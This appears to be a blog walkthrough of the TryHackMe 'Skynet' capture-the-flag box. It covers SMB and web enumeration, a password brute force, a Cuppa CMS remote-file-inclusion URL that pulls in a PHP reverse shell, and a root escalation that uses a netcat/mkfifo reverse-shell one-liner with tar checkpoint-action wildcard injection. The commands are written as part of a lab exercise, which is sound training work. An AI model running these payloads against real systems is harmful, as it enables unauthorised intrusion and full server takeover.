OSCP Prep – THM – Skynet
Since HackTheBox had problems yesterday I did OSCP like box from TryHackMe instead. This is a Linux box with a pretty straightforward approach. In the initial search there were a couple ports open, such as SMB, HTTP, POP3 and imap. Enumerting each of these ports will give you initial access, and root eventually.
Table Of Contents
Enumeration
I start with an NMAP scan. From the NMAP scan I see that SMB, IMAP, POP3, HTTP are some interesting open ports. So we will enumerate them in a bit.
root@ip-10-10-253-253:~/ctf# nmap -sC -sV 10.10.73.85 -oN nmap.result
Starting Nmap 7.60 ( https://nmap.org ) at 2022-01-11 11:21 GMT
Nmap scan report for ip-10-10-73-85.eu-west-1.compute.internal (10.10.73.85)
Host is up (0.00060s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES AUTH-RESP-CODE CAPA SASL TOP PIPELINING UIDL
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: listed ID more OK SASL-IR LITERAL+ have IDLE IMAP4rev1 post-login Pre-login capabilities LOGINDISABLEDA0001 LOGIN-REFERRALS ENABLE
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 02:55:B6:AE:BF:BF (Unknown)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2022-01-11T05:21:32-06:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-01-11 11:21:32
|_ start_date: 1600-12-31 23:58:45
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.33 seconds
I like to start enumerating SMB first to see if I find anything interesting.
Enumerating SMB
Taking a look at what shares are available we find some interesting. Since anonymous access is allowede we can list the shares and possible access some of them.
root@ip-10-10-253-253:~/ctf# smbclient -L //10.10.73.85
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP SKYNET
The two interersting shares here is anonymous and milesdyson. In the anonymous share we find a note that says that there have been a system malfunction and all skynet employees must change their password.
root@ip-10-10-253-253:~/ctf# cat attention.txt A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this. -Miles Dyson
Digging furthere in the share, there is a directory called logs. In the directory there are some log files, all of them are empty except one. This looks like a list of passwords, which we will save for later.
root@ip-10-10-253-253:~/ctf# cat log1.txt
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator
The other share, milesdyson, we have no access to it. One of the question in the task is what is miles dysons password.
Enumerating HTTP
Look at the webserver we are presented with skynets searchengine. I didn’t find anything interesting here, so I started up gobuster and did a subdirectory bruteforce using the common.txt wordlist.
root@ip-10-10-253-253:~/ctf# gobuster dir -u http://10.10.73.85 -w /usr/share/wordlists/dirb/common.txt
===============================================================
2022/01/11 11:41:40 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/config (Status: 301)
/css (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/server-status (Status: 403)
/squirrelmail (Status: 301)
===============================================================
2022/01/11 11:41:40 Finished
===============================================================
One that stands out here is squirrelamil. The other subdirectories we had no access to.
From earlier enumeration we have a username for Miles Dyson, which is milesdyson and we have a list of passwords from logs1.txt we could try out.
So spinning up BurpSuit we could intercept login request, send it to intruder and try and bruteforce our way in. In the picture below I’ve added the position where intruder will insert our passwordlist.
Right off the bat we can see that cyborg007haloterminator have another length than the other passwords, and HTTP status code of 302 (redirect), giving us a hint that this might be the correct password.
Squirrel Mail
Logging into Miles Dysons inbox we find his SMB password and we can try and see what we can find in his personal SMB share, milesdyson.
Inside his share we find alot of files, but one of them is named important.txt.
root@ip-10-10-253-253:~/ctf# cat important.txt
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
Hidden Directory
There is an hidden directory on the webserver named /45kra24zxs28v3yd.
Running gobuster against this hidden directory we find another subdirectory named Administrator.
root@ip-10-10-253-253:~/ctf# gobuster dir -u http://10.10.73.85/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
2022/01/11 11:58:11 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/administrator (Status: 301)
/index.html (Status: 200)
===============================================================
2022/01/11 11:58:12 Finished
A quick google search reveal that there is a Remote File Inclusion vulnerability in this CMS, making it possbile for us to get a reverse shell.
From Exploit-db:
An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise. http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
and using gobuster to verify that there is an alerts sub directory.
root@ip-10-10-253-253:~/ctf# gobuster dir -u http://10.10.73.85/45kra24zxs28v3yd/administrator/ -w /usr/share/wordlists/dirb/common.txt -x php
===============================================================
2022/01/11 12:01:21 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.hta (Status: 403)
/.hta.php (Status: 403)
/alerts (Status: 301)
/classes (Status: 301)
/components (Status: 301)
/index.php (Status: 200)
/index.php (Status: 200)
/js (Status: 301)
/media (Status: 301)
/templates (Status: 301)
===============================================================
2022/01/11 12:01:22 Finished
A quick PoC:
Initial access
Confirming that we have LFI, we could try RFI.
The steps are as follow:
- Edit the php reverse shell script and add our local ip and port.
- Start a simple http server
- Start a netcat listener.
- Visit
http://10.10.73.85/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.253.253:9000/php-reverse-shell.php - And we have a connection on our listener.
And after stabilizing our shell, we can look for user.txt
Root
In Miles Dysons home directory there is a directory caleld backups where there are two files backup.sh and backup.tgz. Both are owned by root.
www-data@skynet:/home/milesdyson/backups$ ls -l
total 4
-rwxr-xr-x 1 root root 74 Sep 17 2019 backup.sh
-rw-r--r-- 1 root root 0 Jan 11 06:29 backup.tgz
www-data@skynet:/home/milesdyson/backups$ cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
and looking at Crontab we see that backup.sh is executed every minute.
www-data@skynet:/home/milesdyson/backups$ cat /etc/crontab
*/1 * * * * root /home/milesdyson/backups/backup.sh
Since tar is using wildcard we can abuse it with placing our shell in the direcotry its backing up since we have write permission to that directory. And from GTFObins.
www-data@skynet:/var/www/html$ echo "mkfifo /tmp/fmbw; nc 10.10.253.253 8888 0</tmp/fmbw | /bin/sh >/tmp/fmbw 2>&1; rm /tmp/fmbw" > shell.sh
www-data@skynet:/var/www/html$ echo "" > "--checkpoint-action=exec=sh shell.sh"
www-data@skynet:/var/www/html$ echo "" > --checkpoint=1From tar man page:
| –checkpoint-action=ACTION | Execute ACTION at every checkpoint. ACTION may be one of the following: |
| –checkpoint[=NUMBER] | Use “checkpoints”: display a progress message every NUMBER records (default 10). |
Starting our netcat listener and listening to port 8888, we wait for cron to run the script.
